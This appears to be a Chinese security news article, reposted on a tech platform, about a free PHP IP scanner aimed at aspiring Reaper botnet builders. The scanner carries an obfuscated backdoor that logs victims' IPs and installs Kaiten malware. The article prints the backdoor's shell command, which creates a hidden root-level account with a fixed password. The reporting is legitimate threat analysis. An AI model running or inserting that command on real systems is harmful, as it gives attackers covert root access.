借Reaper僵尸网络推广免费IP扫描器 然后在IP扫描器里面放个后门

在过去数周内,那些希望创建自己的Reaper僵尸网络的黑客们,在下载IP扫描器的过程中都有“意外收获”。

IP扫描器是一个PHP文件。数周前,在关于Reaper新闻报道出来前,该PHP文件可免费下载。Reaper是由漏洞路由器和IoT设备组成的僵尸网络。

Reaper的不同之处在于,创建者利用IP扫描器寻找漏洞系统,然后利用漏洞利用程序去发现各种漏洞,在漏洞设备上安装Reaper恶意软件。这与近期很多僵尸网络(如Mirai和Hijime)不同,它们利用Telnet和SSH暴力字典对不安全设备发起攻击。

黑客搭车Reaper僵尸网络事件 传播自己的IP扫描器

聪明的诈骗分子很快意识到,随着这个新型僵尸网络的兴起,想要成为黑客的人和脚本小子们很快就会开始寻找各种构建类似僵尸网络的工具。

因此,该攻击者(我们不想本文中提及名字)创建了一个网站。他在该网站上推广一个PHP脚本,可从本地名为poop.txt的文本文档中读取IP地址,并检查IP是否是托管在GoAhead web服务器上,然后在GoAhead-Filtered.txt文件中列出正面结果。

黑客们对该脚本很有兴趣,因为可用于识别GoAhead服务器设备,通常是IP安全摄像头。这些设备上通常存在公共漏洞利用程序,也是Reaper僵尸网络的攻击目标。

随机字符墙后的多数PHP脚本都进行了模糊处理。对此,技术知识欠缺和未留意到PHP脚本源代码的脚本小子们并不感到奇怪。青天科技(NewSky Security)发现了这一点,其首席研究人员Ankit Anubhav表示:

“这种情况下,脚本通过ROT13和base64进行多次加密,并且数据也是压缩的。”

谁曾想 IP扫描器脚本有后门 黑客秒变肉鸡

进行代码反编译后,Anubhav表示,该脚本包含很明显的后门,有经验的程序员都可以预见到大量模糊化的源代码。

这些代码包含四部分。第一部分是功能完备的IP扫描器 。第二部分运营Bash命令,在Linux服务器上添加新用户,受害者可在该服务器上执行IP扫描器脚本。第三部分是在远程服务器上登录受害者IP地址。第四部分是在执行IP扫描器的服务器上下载和执行Kaiten僵尸网络恶意软件。

一般而言,那些寻求创建自己的类似Reaper僵尸网络的“黑客小子”们,最后都沦为他人Kaiten僵尸网络的组成部分。

并且,通过使用已登录的IP地址和后门账户(用户名VM,密码Meme123),提供该脚本的攻击者还能够登录受感染的服务器.

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash VM; echo -e "Meme123\nMeme123" | passwd VM;

在接受媒体采访中,Anubhav还指出,攻击者可利用该后门收集包含其他人扫描结果的GoAhead-Filtered.txt文件,并在其他僵尸网络攻击者为了做好其他一切准备后,利用这些IP地址劫持GoAhead摄像头。

其它黑客发现后门 在Twitter喊话那个“作死者”

整个过程并不复杂,Anubhav并不是唯一发现后门的人 。其他黑客也发现了后门,并在Twitter上喊话创建者。

通过深入挖掘后门创建者所用的一些ID,我们还发现:这不是他第一次发布后门恶意软件,也不是第一次与其他黑客在线争吵 。这也许就是Anubhav能够发现黑客名义的dox文件的原因。

本文写作之时,兜售PHP脚本的网站已被叫停,但Anubhav告诉媒体称:

电脑黑客还会继续在地下黑客论坛上出售其他脚本,并会为想要建立IoT僵尸网络的人提供支持。

这也不是黑客地下市场提供的第一个后门恶意软件 。今年9月份,Zscaler发现了一个隐藏在Cobian RAT恶意软件中的后门。当时,该后门在各种地下黑客论坛上出售。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

新型僵尸网络:Wonder Botnet深入分析

CSE CybSec Z-Lab恶意软件实验室在调查暗网恶意代码时发现了一个名为Wonder botnet的新僵尸网络,该恶意软件由Downloader和真正的...

2566
来自专栏Zchannel

以全新的视角来评测公共 CDN

之前在 V2EX 上看到这篇「用程序猿视野看公共 CDN」,感觉写的不仅不详细,还有很多纰漏和错误。可是嘲笑别人写得不好,总得自己写篇更好的才行嘛,所以我就写了...

1984
来自专栏字根中文校对软件

Apache CloudStack 4.5.2 新特性一览

     Apache CloudStack 4.5.2 新特性一览 ? CloudStack 4.5.2 相比前一个版本修复了大约 200 个Bug。   ...

2896
来自专栏程序员互动联盟

黑客利用Wi-Fi攻击你的七种方法

Wifi热点随处可见,我们好多人进入饭店,茶餐厅等第一句话就是:有没有wifi啊?我们知道公共wifi是非常容易受到攻击的。那么家用wifi呢?下面的文章介绍了...

3876
来自专栏软件开发 -- 分享 互助 成长

职责链模式

一、简介 1、当客户提交一个请求时,请求沿着链传递直到有一个管理者对象处理它。 2、UML ? 3、所属类别:行为型 二、程序 1 // 职责链模式.cpp...

1897
来自专栏源哥的专栏

基于linux的嵌入IPv4协议栈的内容过滤防火墙系统(2)-概要引言

概要:在Linux系统下,具有图形界面的防火墙系统很少,而包含内容过滤的防火墙系统更可以说是少之又少,本程序不仅具有防火墙功能,而且可以对rar、zip压缩格式...

583
来自专栏FreeBuf

TR-064漏洞受影响厂商设备及TR-064协议安全性分析

作者:英国Xiphos Research高级安全研究员 Darren Martyn 过去几个星期,嵌入式设备表现出来的安全状况让人担忧,在Mirai的早期代码...

2076
来自专栏FreeBuf

新加坡新保集团(SingHealth)网络攻击事件的可疑线索分析

近期,安全公司 Trustwave 旗下 SpiderLabs 实验室发现了可能与新加坡新保集团(SingHealth)网络攻击相关的一些信息线索,在前一篇文章...

712
来自专栏FreeBuf

我是如何黑掉英国间谍软件公司Gamma的

前几天,有黑客《入侵了英国间谍软件公司Gamma》。本文翻译自黑客自己公布的入侵指南。详细的介绍了从信息收集,到发现目标站点,以及进行源码审计,绕过waf注入,...

42810
来自专栏SAP最佳业务实践

SAP最佳业务实践:SD–外贸出口处理(118)-3销售订单

一、VA01输入销售订单 在此活动中,您可以输入一个销售订单。 后勤 ®销售和分销 ®销售®订单®创建 如果已在系统中安装可退货处理 业务情景,并使用物料 H...

3849

扫码关注云+社区